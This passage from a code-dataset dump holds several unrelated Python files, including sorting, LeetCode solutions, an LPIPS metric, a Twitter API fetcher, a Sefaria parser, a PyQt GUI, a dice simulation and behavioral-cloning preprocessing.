POINT\n#------------------------------------------\nif __name__ == \"__main__\":\n    # Measure the time taken by the main operations\n    start = time.time()\n    \n    # Phase 1: Training\n    # Read CSV from Numpy, Link:\n    # https://docs.scipy.org/doc/numpy/reference/generated/numpy.genfromtxt.html\n    my_data = genfromtxt('Projects/MINST/train.csv', delimiter=',', skip_header=1) \n    print('Reading time:', time.time()-start)\n    start = time.time()\n\n    # Change to True to plot some of the images\n    if False:\n        for row in my_data[:9]:\n            # Documentation for function 'reshape':\n            # https://docs.scipy.org/doc/numpy/reference/generated/numpy.reshape.html\n            A = np.array(row[1:]).reshape(28,28) \n            DrawDigit(A, 'Digit: ' + str(int(row[0])))\n\n    ann = LearnANN(my_data)\n    \n    print('Learning time:', time.time()-start, '- size:', len(my_data))\n    \n    # Phase 2: local test for learning of parameters\n    # TODO\n    \n    # Phase 3: Evaluate on Kaggle test set\n    my_test = genfromtxt('Projects/MINST/test.csv', delimiter=',', skip_header=1)\n    x_test = ElaborateTestSet(my_test) \n    EvaluateANN(ann, x_test)\n    \n    \n\n\n\n\n\n\n\n","sub_path":"python/ann_minst.py","file_name":"ann_minst.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"549735954","text":"def merge_sort(numbers):\n\tif len(numbers) >= 2:\n\t\tlist1 = [numbers[x] for x in range(0, int(0.5*len(numbers)))]\n\t\tlist2 = [numbers[y] for y in range(int(0.5*len(numbers)), len(numbers))]\n\t\tlist3 = merge_sort(list1)\n\t\tlist4 = merge_sort(list2)\n\t\ti = 0\n\t\tj = 0\n\t\tsortedlist =[]\n\t\twhile i < len(list3) and j < len(list4):\n\t\t\tif list3[i] < list4[j]:\n\t\t\t\tsortedlist.append(list3[i])\n\t\t\t\ti += 1\n\t\t\telse:\n\t\t\t\tsortedlist.append(list4[j])\n\t\t\t\tj += 1\n\t\twhile i < len(list3) or j < len(list4):\n\t\t\tif i < len(list3):\n\t\t\t\tsortedlist.append(list3[i])\n\t\t\t\ti += 1\n\t\t\telse:\n\t\t\t\tsortedlist.append(list4[j])\n\t\t\t\tj += 1\n\t\treturn sortedlist\n\telse:\n\t\treturn numbers\n\ndef main():\n\tnumbers = [5,4,1,8,7,9,6,2,3]\n\tprint (merge_sort(numbers))\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"week1/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"393656892","text":"import os\n\nimport tensorflow as tf\n\n\ndef lpips(input0, input1, 
model='net-lin', net='alex', version=0.1):\n    \"\"\"\n    Learned Perceptual Image Patch Similarity (LPIPS) metric.\n\n    Args:\n        input0: An image tensor of shape `[..., height, width, channels]`,\n            with values in [0, 1].\n        input1: An image tensor of shape `[..., height, width, channels]`,\n            with values in [0, 1].\n\n    Returns:\n        The Learned Perceptual Image Patch Similarity (LPIPS) distance.\n\n    Reference:\n        Richard Zhang, Phillip Isola, Alexei A. Efros, Eli Shechtman, Oliver Wang.\n        The Unreasonable Effectiveness of Deep Features as a Perceptual Metric.\n        In CVPR, 2018.\n    \"\"\"\n    # flatten the leading dimensions\n    batch_shape = tf.shape(input0)[:-3]\n    input0 = tf.reshape(input0, tf.concat([[-1], tf.shape(input0)[-3:]], axis=0))\n    input1 = tf.reshape(input1, tf.concat([[-1], tf.shape(input1)[-3:]], axis=0))\n    # NHWC to NCHW\n    input0 = tf.transpose(input0, [0, 3, 1, 2])\n    input1 = tf.transpose(input1, [0, 3, 1, 2])\n    # normalize to [-1, 1]\n    input0 = input0 * 2.0 - 1.0\n    input1 = input1 * 2.0 - 1.0\n\n    input0_name, input1_name = '0:0', '1:0'\n    pb_fname = os.path.join(os.path.dirname(__file__), 'models/v%s/%s_%s.pb' % (version, model, net))\n    with open(pb_fname, 'rb') as f:\n        graph_def = tf.GraphDef()\n        graph_def.ParseFromString(f.read())\n    _ = tf.import_graph_def(graph_def,\n                            input_map={input0_name: input0, input1_name: input1})\n    distance, = tf.get_default_graph().get_operations()[-1].outputs\n\n    if distance.shape.ndims == 4:\n        distance = tf.squeeze(distance, axis=[-3, -2, -1])\n    # reshape the leading dimensions\n    distance = tf.reshape(distance, batch_shape)\n    return distance\n
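\n\n# Usage sketch (added for illustration, not part of the original module); it\n# assumes the pretrained .pb weights are present under models/ next to this\n# file and that inputs are NHWC float images in [0, 1]:\nif __name__ == '__main__':\n    img0 = tf.placeholder(tf.float32, [None, 64, 64, 3])  # hypothetical shapes\n    img1 = tf.placeholder(tf.float32, [None, 64, 64, 3])\n    dist = lpips(img0, img1)  # one LPIPS distance per batch element\n","sub_path":"lpips.py","file_name":"lpips.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"89020560","text":"\"\"\"\n2161. Partition Array According to Given Pivot\n\nYou are given a 0-indexed integer array nums and an integer pivot. Rearrange nums such that the following conditions are satisfied:\n\n    Every element less than pivot appears before every element greater than pivot.\n    Every element equal to pivot appears in between the elements less than and greater than pivot.\n    The relative order of the elements less than pivot and the elements greater than pivot is maintained.\n    More formally, consider every pi, pj where pi is the new position of the ith element and pj is the new position of the jth element. For elements less than pivot, if i < j and nums[i] < pivot and nums[j] < pivot, then pi < pj. Similarly for elements greater than pivot, if i < j and nums[i] > pivot and nums[j] > pivot, then pi < pj.\n\nReturn nums after the rearrangement.\n\n \n\nExample 1:\n\nInput: nums = [9,12,5,10,14,3,10], pivot = 10\nOutput: [9,5,3,10,10,12,14]\nExplanation: \nThe elements 9, 5, and 3 are less than the pivot so they are on the left side of the array.\nThe elements 12 and 14 are greater than the pivot so they are on the right side of the array.\nThe relative ordering of the elements less than and greater than pivot is also maintained. [9, 5, 3] and [12, 14] are the respective orderings.\n\nExample 2:\n\nInput: nums = [-3,4,3,2], pivot = 2\nOutput: [-3,2,4,3]\nExplanation: \nThe element -3 is less than the pivot so it is on the left side of the array.\nThe elements 4 and 3 are greater than the pivot so they are on the right side of the array.\nThe relative ordering of the elements less than and greater than pivot is also maintained. 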
[-3] and [4, 3] are the respective orderings.\n\n \nConstraints:\n\n    1 <= nums.length <= 10^5\n    -10^6 <= nums[i] <= 10^6\n    pivot equals an element of nums.\n\n\"\"\"\n\n\nfrom typing import List\n\n\nclass Solution:\n    def pivotArray(self, nums: List[int], pivot: int) -> List[int]:\n        ans = []\n\n        nums.remove(pivot)\n\n        i = 0\n        ans.append(pivot)\n\n        for j in nums:\n            if j < pivot:\n                ans.insert(i, j)\n                i = i+1\n            elif j == pivot:\n                ans.insert(i+1, j)\n            else:\n                ans.append(j)\n\n        return ans\n\n\nclass Solution:\n    # Simple solution faster than 99.7%\n    def pivotArray(self, nums: List[int], pivot: int) -> List[int]:\n        small_list = [item for item in nums if item < pivot]\n        large_list = [item for item in nums if item > pivot]\n        pivot_count = nums.count(pivot)\n        return small_list + [pivot]*pivot_count + large_list\n\n\nclass Solution:\n    def pivotArray(self, nums: List[int], pivot: int) -> List[int]:\n        # O(n log n)\n        def key(v):\n            if v < pivot:\n                return -1\n            if v > pivot:\n                return 1\n            return 0\n        return sorted(nums, key=key)\n","sub_path":"leetcode/Medium/_2161.Partition_Array_According_to_Given_Pivot.py","file_name":"_2161.Partition_Array_According_to_Given_Pivot.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"75766442","text":"# -*- coding:utf-8 -*-\nfrom requests_oauthlib import OAuth1Session\nimport json\nimport time\nimport pandas as pd\nfrom oauth_key import *\n\nurl = \"https://api.twitter.com/1.1/statuses/home_timeline.json\"\n\n# variable that sets how many items to fetch per request\nparams = { 'count': 10 }\n\nTweetList = []\n\ntwitter = OAuth1Session(consumer_key, consumer_secret, access_key, access_secret)\n\n# fetch with params the specified number of times\nfor i in range(5):\n    req = twitter.get(url, params = params)\n\n    # if the status code is 200 (accessed normally), store the data into TweetList\n    if req.status_code == 200:\n        timeline = json.loads(req.text)\n        for tweet in timeline:\n            TweetList.append(tweet[\"text\"])\n\n    # on error, print the status code we received\n    else:\n        print(\"Error: %d\" % req.status_code)\n\n    # wait one second after each fetch\n    time.sleep(1)\n\ndf = pd.DataFrame(TweetList)\ndf.to_csv('hogehoge.csv')\n","sub_path":"get_text.py","file_name":"get_text.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"160119020","text":"# -*- coding: utf-8 -*-\nimport codecs\nimport regex\nfrom sefaria.model import *\nfrom sources import functions\nfrom parsing_utilities import util\n# from sources.Match import match_new\nfrom sources.Match.match import Match\nfrom sefaria.model.schema import AddressTalmud, SchemaNode, JaggedArrayNode\n\n\ndef create_index():\n    rabbeinu_yonah_schema = create_schema()\n    rabbeinu_yonah_schema.validate()\n    index = {\n        \"title\": \"Rabbeinu Yonah on Pirkei Avot\",\n        \"categories\": [\"Commentary2\", \"Pirkei Avot\", \"Rabbeinu Yonah\"],\n        \"schema\": rabbeinu_yonah_schema.serialize()\n    }\n    return index\n\ndef create_schema():\n    rb_schema = JaggedArrayNode()\n    rb_schema.add_title('Rabbeinu Yonah on Pirkei Avot', 'en', primary=True)\n    rb_schema.add_title(u'רבינו יונה על פרקי אבות', 'he', primary=True)\n    rb_schema.key = 'Rabbeinu Yonah on Pirkei Avot'\n    rb_schema.depth = 3\n    rb_schema.addressTypes = [\"Integer\", \"Integer\", \"Integer\"]\n    rb_schema.sectionNames = [\"Perek\", \"Mishna\", \"Comment\"]\n    return rb_schema\n\n\ndef parse_and_post(file_name):\n    mishna_number_regex = regex.compile(u'([\\u05d0-\\u05ea]{1,3})')\n    rb_yonah_on_avot, perek_level_list, mishna_level_list = [], [], []\n    new_perek, 
first_perek = True, True\n last_mishna = 0\n with codecs.open(file_name, 'r', 'utf-8') as the_file:\n for each_line in the_file:\n\n if \"@00\" in each_line:\n if not first_perek:\n perek_level_list.append(mishna_level_list)\n rb_yonah_on_avot.append(perek_level_list)\n perek_level_list, mishna_level_list = [], []\n new_perek = True\n\n else:\n first_perek = False\n\n elif \"@22\" in each_line:\n if not new_perek:\n perek_level_list.append(mishna_level_list)\n mishna_level_list = []\n\n match_object = mishna_number_regex.search(each_line)\n mishna_number = util.getGematria(match_object.group(1))\n diff = mishna_number - last_mishna\n while diff > 1:\n perek_level_list.append([])\n diff -= 1\n\n last_mishna = mishna_number\n\n else:\n new_perek = False\n last_mishna = 1\n\n else:\n divided_string = each_line.split(u'~')\n for line in divided_string:\n line = line.strip()\n if line:\n line = clean_up_string(line)\n mishna_level_list.append(line)\n\n rb_yonah_on_avot.append(perek_level_list)\n post_the_text(rb_yonah_on_avot)\n return rb_yonah_on_avot\n\n\ndef clean_up_string(string):\n string = remove_substrings(string, ['@11', '@33'])\n return string\n\n\ndef remove_substrings(string, list_of_tags):\n for tag in list_of_tags:\n string = string.replace(tag, '')\n return string\n\n\ndef post_the_text(ja):\n testing_file = codecs.open(\"testing_file.txt\", 'w', 'utf-8')\n util.jagged_array_to_file(testing_file, ja, ['Perek', 'Mishna', 'Comment'])\n testing_file.close()\n ref = create_ref()\n text = create_text(ja)\n functions.post_text(ref, text)\n\n\ndef create_ref():\n ref = 'Rabbeinu Yonah on Pirkei Avot'\n return ref\n\n\ndef create_text(jagged_array):\n return {\n \"versionTitle\": \"Pirkei Avot, Berlin, 1848\",\n \"versionSource\": \"http://primo.nli.org.il/primo_library/libweb/action/dlDisplay.do?vid=NLI&docId=NNL_ALEPH001063744\",\n \"language\": \"he\",\n \"text\": jagged_array\n }\n\n\ndef create_links(rb_ja):\n list_of_links = []\n for perek_index, perek in enumerate(rb_ja):\n for mishna_index, mishna in enumerate(perek):\n for comment_index, comment in enumerate(mishna):\n list_of_links.append(create_link_dicttionary(perek_index+1, mishna_index+1, comment_index+1))\n functions.post_link(list_of_links)\n\n\ndef create_link_dicttionary(perek_bumber, mishna_number, comment_index):\n return {\n \"refs\": [\n \"Pirkei Avot {}.{}\".format(perek_bumber, mishna_number),\n \"Rabbeinu Yonah on Pirkei Avot {}.{}.{}\".format(perek_bumber, mishna_number, comment_index)\n ],\n \"type\": \"commentary\",\n }","sub_path":"sources/Rabbeinu_Yonah_Avot/rb_yonah_functions.py","file_name":"rb_yonah_functions.py","file_ext":"py","file_size_in_byte":4431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"459789318","text":"\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\n\r\n\r\nclass Ui_MainWindow(object):\r\n def setupUi(self, MainWindow):\r\n MainWindow.setObjectName(\"MainWindow\")\r\n MainWindow.resize(700, 600)\r\n self.centralwidget = QtWidgets.QWidget(MainWindow)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.centralwidget)\r\n self.horizontalLayout_2.setObjectName(\"horizontalLayout_2\")\r\n self.horizontalLayout = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\r\n \r\n # text layout\r\n self.textLayout = QtWidgets.QVBoxLayout()\r\n self.textLayout.setContentsMargins(20, 20, 20, 0)\r\n self.textLayout.setObjectName(\"textLayout\")\r\n #code 
label\r\n self.codeLabel = QtWidgets.QLabel(self.centralwidget)\r\n self.codeLabel.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.codeLabel.setObjectName(\"codeLabel\")\r\n self.textLayout.addWidget(self.codeLabel)\r\n #code text\r\n self.codeText = QtWidgets.QTextEdit(self.centralwidget)\r\n self.codeText.setFrameShadow(QtWidgets.QFrame.Raised)\r\n self.codeText.setObjectName(\"codeText\")\r\n self.textLayout.addWidget(self.codeText)\r\n #spacer\r\n spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.textLayout.addItem(spacerItem)\r\n # result label\r\n self.resutLabel = QtWidgets.QLabel(self.centralwidget)\r\n self.resutLabel.setObjectName(\"resutLabel\")\r\n self.textLayout.addWidget(self.resutLabel)\r\n #result text\r\n self.resultText = QtWidgets.QTextEdit(self.centralwidget)\r\n self.resultText.setObjectName(\"resultText\")\r\n self.textLayout.addWidget(self.resultText)\r\n self.horizontalLayout.addLayout(self.textLayout)\r\n #button layout\r\n self.buttonLayout = QtWidgets.QVBoxLayout()\r\n self.buttonLayout.setSizeConstraint(QtWidgets.QLayout.SetNoConstraint)\r\n self.buttonLayout.setContentsMargins(-1, -1, 10, -1)\r\n self.buttonLayout.setSpacing(0)\r\n self.buttonLayout.setObjectName(\"buttonLayout\")\r\n #new button\r\n self.newButton = QtWidgets.QPushButton(self.centralwidget)\r\n icon = QtGui.QIcon()\r\n icon.addPixmap(QtGui.QPixmap(\"icons/new.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\r\n self.newButton.setIcon(icon)\r\n self.newButton.setIconSize(QtCore.QSize(24, 24))\r\n self.newButton.setObjectName(\"newButton\")\r\n self.buttonLayout.addWidget(self.newButton)\r\n self.newButton.clicked.connect(self.new)\r\n #analyse button\r\n self.analyseButton = QtWidgets.QPushButton(self.centralwidget)\r\n icon1 = QtGui.QIcon()\r\n icon1.addPixmap(QtGui.QPixmap(\"icons/analyse.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\r\n self.analyseButton.setIcon(icon1)\r\n self.analyseButton.setIconSize(QtCore.QSize(24, 24))\r\n self.analyseButton.setObjectName(\"analyseButton\")\r\n self.buttonLayout.addWidget(self.analyseButton)\r\n self.analyseButton.clicked.connect(self.analyse)\r\n #compile button\r\n self.compileButton = QtWidgets.QPushButton(self.centralwidget)\r\n icon2 = QtGui.QIcon()\r\n icon2.addPixmap(QtGui.QPixmap(\"icons/compile.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\r\n self.compileButton.setIcon(icon2)\r\n self.compileButton.setIconSize(QtCore.QSize(24, 24))\r\n self.compileButton.setObjectName(\"compileButton\")\r\n self.buttonLayout.addWidget(self.compileButton) \r\n self.compileButton.clicked.connect(self.runCompile)\r\n\r\n self.horizontalLayout.addLayout(self.buttonLayout)\r\n self.horizontalLayout_2.addLayout(self.horizontalLayout)\r\n MainWindow.setCentralWidget(self.centralwidget)\r\n\r\n \r\n\r\n self.retranslateUi(MainWindow)\r\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\r\n\r\n def retranslateUi(self, MainWindow):\r\n _translate = QtCore.QCoreApplication.translate\r\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\r\n self.codeLabel.setText(_translate(\"MainWindow\", \"Code goes here\"))\r\n self.codeText.setToolTip(_translate(\"MainWindow\", \"Type Code here\"))\r\n self.resutLabel.setText(_translate(\"MainWindow\", \"Result\"))\r\n self.newButton.setText(_translate(\"MainWindow\", \"New\"))\r\n self.analyseButton.setText(_translate(\"MainWindow\", \"Analyse\"))\r\n self.compileButton.setText(_translate(\"MainWindow\", \"Compile\"))\r\n \r\n def new (self):\r\n 
self.codeText.clear()\r\n self.resultText.clear()\r\n \r\n def analyse(self):\r\n self.resultText.clear()\r\n self.resultText.setText(self.codeText.toPlainText())\r\n \r\n def runCompile(self):\r\n self.resultText.clear()\r\n #run compile\r\n #self.resultText.setText(\"something\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n app = QtWidgets.QApplication(sys.argv)\r\n MainWindow = QtWidgets.QMainWindow()\r\n ui = Ui_MainWindow()\r\n ui.setupUi(MainWindow)\r\n MainWindow.show()\r\n sys.exit(app.exec_())\r\n","sub_path":"interface/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":5200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"30423472","text":"from die import Die\nimport pygal\n\ndie = Die()\nresults = []\n# 模拟1000次掷六面骰子\nfor roll in range(1000):\n result = die.roll()\n results.append(result)\nprint(results)\n\nfrequencies = []\n# 统计每个点数出现的次数\nfor value in range(1, die.num_sides + 1):\n frequency = results.count(value)\n frequencies.append(frequency)\nprint(frequencies)\n\nhist = pygal.Bar()\nhist.title = \"Results of rolling one D6 1000 times.\"\n# x轴的标签\nhist.x_labels = ['1', '2', '3', '4', '5', '6']\n# 坐标轴的名称\nhist._x_title = \"Result\"\nhist._y_title = \"Frequency of Results\"\n# 将获取到的数据列表加入,并标签为'D6'\nhist.add('D6', frequencies)\n# 将图表渲染成SVG文件,可在浏览器中打开,具有交互性,数据发生变化,只需刷新网页即可看到变化\nhist.render_to_file('die_simulation.svg')\n","sub_path":"die_simulation.py","file_name":"die_simulation.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"85738794","text":"# yapf: disable\nfrom copy import deepcopy\n\n# Default Parameters\ndefault_params = {\n # config summary\n \"algo\": \"NF\",\n \"config\": \"default\",\n # environment config\n \"env_name\": \"InvertedPendulum-v2\",\n \"r_scale\": 1.0,\n \"r_shift\": 0.0,\n \"eps_length\": 0,\n \"env_args\": {},\n \"fix_T\": False,\n # learner\n \"pretrained\": None,\n \"offline_num_epochs\": int(1e3),\n \"offline_num_batches_per_epoch\": 1000,\n \"random_expl_num_cycles\": int(0),\n \"num_epochs\": int(0),\n \"num_cycles_per_epoch\": 1,\n \"num_batches_per_cycle\": 1000,\n \"expl_num_episodes_per_cycle\": None,\n \"expl_num_steps_per_cycle\": 1000,\n \"eval_num_episodes_per_cycle\": 0,\n \"eval_num_steps_per_cycle\": None,\n # agent config\n \"agent\": {\n \"offline_batch_size\": 256,\n # replay buffer setup\n \"buffer_size\": int(1e6),\n # normalize observation\n \"norm_obs_offline\": True,\n \"norm_eps\": 0.01,\n \"norm_clip\": 5,\n # critic network\n \"q_lr\": 3e-4,\n \"layer_sizes\": [256, 256],\n # maf\n \"maf_lr\": 2e-4,\n \"maf_layer_sizes\": [256, 256],\n \"num_bijectors\": 4,\n \"prm_loss_weight\": 1.,\n \"reg_loss_weight\": 100.,\n \"logprob_scale\": 1.,\n \"min_logprob\": -5.0,\n },\n \"seed\": 0,\n}\n\n# OpenAI Gym\ngym_mujoco_params = deepcopy(default_params)","sub_path":"rlfd/rlfd/params/nf.py","file_name":"nf.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"315184830","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 19 21:45:59 2018\n\n@author: Arash\n\"\"\"\n\n#%%\nimport csv\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom keras.models import Sequential\nfrom keras.layers import Flatten, Dense, Lambda, Cropping2D, Convolution2D, Dropout\n\n\n\n#%%\nlines = []\nwith open( 
\"/Users/Arash/GitHub/CarND-Behavioral-Cloning-P3/data/driving_log.csv\" ) as csvfile:\n reader = csv.reader( csvfile )\n for line in reader:\n lines.append( line )\n\nimagesC = []\nimagesL = []\nimagesR = []\nmeasurmentsC = []\nmeasurmentsL = []\nmeasurmentsR = []\nfor line in lines:\n image = cv2.imread( line[ 0 ] )\n imagef = cv2.flip(image,1)\n imagesC.append( image )\n imagesC.append(imagef)\n\n image = cv2.imread(line[1])\n imagef = cv2.flip(image, 1)\n imagesL.append(image)\n imagesL.append(imagef)\n\n image = cv2.imread(line[2])\n imagef = cv2.flip(image,1)\n imagesR.append(image)\n imagesR.append(imagef)\n\n measurment = float( line[ 3 ] )\n '''if measurment == 0:\n measurment = measurment+np.random.rand(1)'''\n measurmentsC.append( measurment )\n measurmentsC.append( -measurment)\n\n measurmentl = measurment+.2\n measurmentsL.append( measurmentl)\n measurmentsL.append(-measurmentl)\n\n measurmentr = measurment-.2\n measurmentsR.append( measurmentr)\n measurmentsR.append(-measurmentr)\n\n'''\nX_train = np.array( images )\ny_train = np.array( measurments )\n'''\nimagesC = np.array(imagesC)\nimagesR = np.array(imagesR)\nimagesL = np.array(imagesL)\n\nimages = []\nimages.extend(imagesC)\nimages.extend(imagesL)\nimages.extend(imagesR)\n\nmeasurmentsC_before =measurmentsC\nmeasurmentsC = np.array(measurmentsC)\nmeasurmentsC[measurmentsC==0] = measurmentsC[measurmentsC==0]+(.0001*np.random.randn(measurmentsC[measurmentsC==0].shape[0]))\n\n\n\nmeasurmentsR_before =measurmentsR\nmeasurmentsR = np.array(measurmentsR)\nmeasurmentsR[measurmentsR==-.2] = measurmentsR[measurmentsR==-.2]+(.0001*np.random.randn(measurmentsR[measurmentsR==-.2].shape[0]))\n\nmeasurmentsL_before =measurmentsL\nmeasurmentsL = np.array(measurmentsL)\nmeasurmentsL[measurmentsL==.2] = measurmentsL[measurmentsL==.2]+(.0001*np.random.randn(measurmentsL[measurmentsL==.2].shape[0]))\n\n\nmeasurments = []\nmeasurments.extend(measurmentsC)\nmeasurments.extend(measurmentsL)\nmeasurments.extend(measurmentsR)\n\nmeasurments_before = []\nmeasurments_before.extend(measurmentsC_before)\nmeasurments_before.extend(measurmentsL_before)\nmeasurments_before.extend(measurmentsR_before)\n\nplt.figure( \"Histogram\", figsize = (13,8) )\nplt.subplot(1,3,1)\nplt.title(\"Center Camera\")\nplt.hist(measurmentsC)#, np.arange(-1,1,.25))\nplt.ylim(0,12000)\nplt.subplot(1,3,2)\nplt.title(\"Added side cameras\")\nplt.hist( measurments_before)#, np.arange(-1,1,.25))\nplt.ylim(0,12000)\nplt.subplot(1,3,3)\nplt.title(\"Added white noise\")\nplt.hist(measurments)#, np.arange(-1,1,.25))\nplt.ylim(0,12000)\nplt.show()\n\nsmpl_im = np.random.randint( 0, len( imagesC ) )\nplt.figure( \"raw image\")\nplt.subplot( 2, 3, 2 )\nplt.title( \"Center\" )\nplt.imshow( np.array(imagesC[ smpl_im, :, :, : : -1 ]) )\nplt.subplot( 2, 3, 1 )\nplt.title( \"Left\" )\nplt.imshow( np.array(imagesL[ smpl_im, :, :, : : -1 ]) )\nplt.subplot( 2, 3, 3 )\nplt.title( \"Right\" )\nplt.imshow( np.array(imagesR[ smpl_im, :, :, : : -1 ]) )\n\nplt.subplot( 2, 3, 5 )\nplt.title( \"Flipped Center\" )\nflp = np.array(cv2.flip(imagesC[ smpl_im, :, :, :],1))\nplt.imshow( np.array(flp[ :, :, : : -1 ]) )\nplt.subplot( 2, 3, 4 )\nplt.title( \"Flipped Left\" )\nflp = np.array(cv2.flip(imagesL[ smpl_im, :, :, :],1))\nplt.imshow( np.array(flp[ :, :, : : -1 ]) )\nplt.subplot( 2, 3, 6 )\nplt.title( \"Flipped Right\" )\nflp = np.array(cv2.flip(imagesR[ smpl_im, :, :, :],1))\nplt.imshow( np.array(flp[ :, :, : : -1 ]) )\nplt.show()\n\n#X_train = X_train[ :, 45 : 135,:,: ]\n\nplt.figure( \"Cropped 
image\")\nplt.subplot( 1, 3, 2 )\nplt.title( \"Center\" )\nplt.imshow( imagesC[ smpl_im, 75 : 135, :, : : -1 ])\nplt.subplot( 1, 3, 1 )\nplt.title( \"Left\" )\nplt.imshow( imagesL[ smpl_im, 75 : 135, :, : : -1 ])\nplt.subplot( 1, 3, 3 )\nplt.title( \"Right\" )\nplt.imshow( imagesR[ smpl_im, 75 : 135, :, : : -1 ])\nplt.show()\n\n\ny_train = np.array(measurments)\nX_train = np.array(images)\n#%% Model\n'''model=Sequential()\nmodel.add(Lambda(lambda x:x/255.0-0.5, input_shape=(160,320,3),output_shape=(160,320,3)))\nmodel.add(Cropping2D(cropping=((45,15),(0,0))))\nmodel.add(Convolution2D(24,5,5,subsample=(2,2),activation='elu'))\nmodel.add(Convolution2D(36,5,5,subsample=(2,2),activation='elu'))\nmodel.add(Convolution2D(48,5,5,subsample=(2,2),activation='elu'))\nmodel.add(Convolution2D(64,3,3,activation='elu'))\nmodel.add(Convolution2D(64,3,3,activation='elu'))\nmodel.add(Flatten())\n#model.add(Dense(1164))\nmodel.add(Dense(100))\nmodel.add(Dropout(0.6))\nmodel.add(Dense(50))\nmodel.add(Dropout(0.6))\nmodel.add(Dense(10))\nmodel.add(Dense(1))\n\n\n\n\nmodel.compile(loss='mse', optimizer = 'adam')\nmodel.fit(X_train,y_train, validation_split = 0.2, shuffle = True, nb_epoch = 2)\n\nfrom keras.models import Model\n\nprint (\"Training the model ...\")\nhistory = model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=2, \\\n callbacks=outputs, validation_data=(X_validation, y_validation), shuffle=False)\n\nprint(\"Plotting losses ... \")\nplot(model, to_file='model.png')\n\n# list all data in history\nprint(history.history.keys())\n\n# summarize history for loss\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()\n\n\n\nmodel.save('model.h5')\nprint('done')\nlos'''\n'''t = [0.0344,0.0254,.0225,0.0210,0.0200,0.0194,0.0188,0.0183,0.0179,0.0175]\nv = [0.0275,0.0238,0.0220,0.0210,0.0204,0.0197,0.0194,0.0191,.0188,0.0186]\nplt.figure()\nplt.plot(t)\nplt.plot(v)\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()'''\n","sub_path":"developing pipelines and prototype codes/devs.py","file_name":"devs.py","file_ext":"py","file_size_in_byte":5957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"374607952","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#!/usr/bin/env python\n\nimport random\nimport Tkinter # note use of caps\nfrom Tkinter import *\n\t\n\n#set up\nwindow = Tk()\nwindow.title('Magic 8')\nwindow.geometry(\"300x100\") #wxh\nwindow.resizable(0,0)\n\n\nRESPONSES = [\"It is certain\",\n \"It is decidedly so\",\n \"Without a doubt\",\n \"Yes definitely\",\n \"You may rely on it\",\n \"As I see it yes\",\n \"Most likely\",\n \"Outlook good\",\n \"Yes\",\n \"Signs point to yes\",\n \"Reply hazy try again\",\n \"Ask again later\",\n \"Better not tell you now\",\n \"Cannot predict now\",\n \"Concentrate and ask again\",\n \"Don't count on it\",\n \"My reply is no\",\n \"My sources say no\",\n \"Outlook not so good\",\n \"Very doubtful\"] \n \ndef response():\n\tx = random.choice(RESPONSES)\n\t#print x\n\tcircletext2.delete(0, END) # clear prev output\n\tcircletext2.insert(0,str(x))\n \n#define labels - cannot share same name as function\nbox1 = Label(window, text=\"Question: \")\nbox2 = Label(window, text=\"Answer: \") \n\n#place labels\nbox1.grid(row = 1, column = 1, padx = 5, pady = 
